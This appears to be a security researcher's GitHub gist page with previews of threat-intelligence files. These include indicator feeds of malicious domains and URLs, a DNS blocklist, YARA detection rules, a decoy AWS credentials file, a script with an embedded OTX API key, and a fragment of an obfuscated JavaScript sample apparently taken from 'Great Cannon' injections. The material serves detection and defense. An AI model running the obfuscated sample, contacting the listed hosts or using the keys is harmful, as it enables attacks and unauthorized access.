chrisdoman
chrisdoman
/ cado_lambda.py
Created
February 2, 2022 11:56
View cado_lambda.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import json | |
| import urllib3 | |
| import requests | |
| import datetime | |
| import random | |
| import string | |
| import logging | |
| def lambda_handler(event, context): |
View TestFeed.csv
We can't make this file beautiful and searchable because it's too large.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| indicator,indicator_type,pulse_title,pulse_author,tlp | |
| ihracat.myq-see.com,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| phantom101.duckdns.org,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| goodattack.duckdns.org,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| http://www.tempinfo.96.lt/wras/savekey.php,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| http://www.tempinfo.96.lt/wras/createkeys.php,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| http://www.tempinfo.96.lt/wras/RANSOM20.jpg,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| www.tempinfo.96.lt,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326,file,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| 62d38f19e67013ce7b2a84cb17362c77e2 |
View aws_credentials_honeytoken
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [default] | |
| aws_access_key_id = AKIAXYZDQCENYTNALZP5 | |
| aws_secret_access_key = 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 | |
| output = json | |
| region = us-east-2 | |
| * This is just a honey token to detect automated scanners looking for AWS keys - this is not a real AWS account! * |
View otx_blocklist.rpz
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| differentia.ru CNAME . | |
| *.differentia.ru CNAME . | |
| disorderstatus.ru CNAME . | |
| *.disorderstatus.ru CNAME . | |
| gvaq70s7he.ru CNAME . | |
| *.gvaq70s7he.ru CNAME . | |
| atomictrivia.ru CNAME . | |
| *.atomictrivia.ru CNAME . | |
| 4nbizac8.ru CNAME . | |
| *.4nbizac8.ru CNAME . |
View get_otx_domains_to_rpz.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Short demonstration script to write OTX hostnames to a RPZ format text-file | |
| from OTXv2 import OTXv2 | |
| import os | |
| # This is the API key for the user "api_example" | |
| otx = OTXv2('766ba1df3ab54db9c0fcbf62ef048c3a04c260e8ca65b6c25346084b7b4719ad') | |
| events = otx.get_all_indicators(author_name='alienvault') | |
| output = '' |
chrisdoman
/ cannon.rule
Created
September 2, 2019 17:32
View cannon.rule
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule hunt_great_cannon { | |
| strings: | |
| $ = "requesttime_list" nocase wide ascii | |
| $ = "responsetime_list" nocase wide ascii | |
| $ = "cloudflare_js_validate_url" nocase wide ascii | |
| $ = "116.255.226.154" nocase wide ascii | |
| $ = "responsetime-requesttime>TIMEGAP" nocase wide ascii | |
| condition: | |
| any of them | |
| } |
View cannon_samples.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var _a="(,& vXh)C;sf<H8O1J|iRY9dj?G%m4}n_M'pQZkFyaEP=Ko2/\\x]!cquSV.57B^lW*Utr{z+N-ADg>[we0b\"I6:TL3",_b="^JL,qMP(*IjReDE<xiQYo{tp>8!-[W&hOcbv12Fn\".%4Ks=5 Z]Cl'uXfAHrdGaN/9}zg\\+U6|kSV:;wmyB7T)_03?",_c="DjOx.}S=Q's_\"I:]c[E(g/JG)k!2yY,zBV4>PFu9rp;N1i<%ZUM*?0K5^nX 8td{LAmH6hbolv&\\a7-ReCq|fw+3TW";eval(function(_,b,a,c,n,r){if(n=function(_){return(_<62?"":n(parseInt(_/62)))+((_%=62)>35?String[_a[11]+_c[40]+_b[20]+_c[66]+_b[51]+_a[6]+_b[62]+_c[40]+_b[51]+_b[20]+_c[62]+_b[12]](_+29):_[_c[61]+_c[71]+_a[56]+_c[61]+_a[68]+_a[19]+_c[57]+_b[68]](36))},0==_a[81][_a[68]+_b[12]+_b[23]+_b[52]+_b[62]+_a[53]+_c[80]](0,n)){for(;a--;)r[n(a)]=c[a];c=[function(_){return r[_]||_}],n=function(){return _c[17]+_c[27]+_b[27]+_a[22]+_a[82]+_b[33]+_c[80]+_a[73]+_a[10]+_a[55]+_c[78]+_a[70]+_a[74]+_c[78]+_a[37]+_c[15]},a=1}for(;a--;)c[a]&&(_=_[_c[40]+_a[80]+_b[23]+_b[52]+_b[62]+_a[53]+_b[12]](new RegExp(_a[49]+_a[82]+n(a)+(_b[69]+_a[82]),_a[76]),c[a]));return _}(_c[27]+_c[59]+_b[84]+_c[65]+_b[75]+_a[45]+_b[9]+_c[0]+_a[44]+_a[89]+_b[88] |
chrisdoman
/ getUrlScanGreatCannonHits.py
Created
September 2, 2019 16:53
View getUrlScanGreatCannonHits.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Gets possible Great Cannon injections from UrlScan | |
| ''' | |
| import requests | |
| import json | |
| # Insert your urlscan API Key | |
| api_key = '' |
View malware.rules
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Yara rules to identify malware families, made by Yabin | |
| Auto-generated - plenty of these rules won't work as they rely on looking for compiled code | |
| */ | |
| rule BackdoorAndroidOSCoca_51dc097980b46d053085ff079b153f107d866a27dc19670b79928ec55ab336d7 { | |
| strings: | |
| $a_2 = { 558bebdcdb73a5fdef349bc5b2931e67 } |
View Reports.csv
We can make this file beautiful and searchable if this error is corrected: It looks like row 7 should actually have columns, instead of 1. in line 6.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| title,reference,created | |
| Continued PassCV Malware,https://drive.google.com/file/d/1pzZT7Stig6i8hTqjxUUgxDSmGEJ7W9ak/view,2018-08-06 | |
| Blackgear Cyberespionage Campaign Resurfaces Abuses Social Media for C and C Communication,https://blog.trendmicro.com/trendlabs-security-intelligence/blackgear-cyberespionage-campaign-resurfaces-abuses-social-media-for-cc-communication/,2018-07-18 | |
| Golden Rat long-term espionage campaign in Syria is still ongoing,http://csecybsec.com/download/zlab/20180723_CSE_APT27_Syria_v1.pdf,2018-07-23 | |
| Chinese Espionage Group TEMP.Periscope Targets Cambodia Ahead of July 2018 Elections and Reveals Broad Operations Globally,https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html,2018-07-11 | |
| Certificates stolen from Taiwanese tech-companies misused in Plead malware campaign,https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/,2018-07-09 | |
| NavRAT Uses US-North Korea Summit As Decoy |
NewerOlder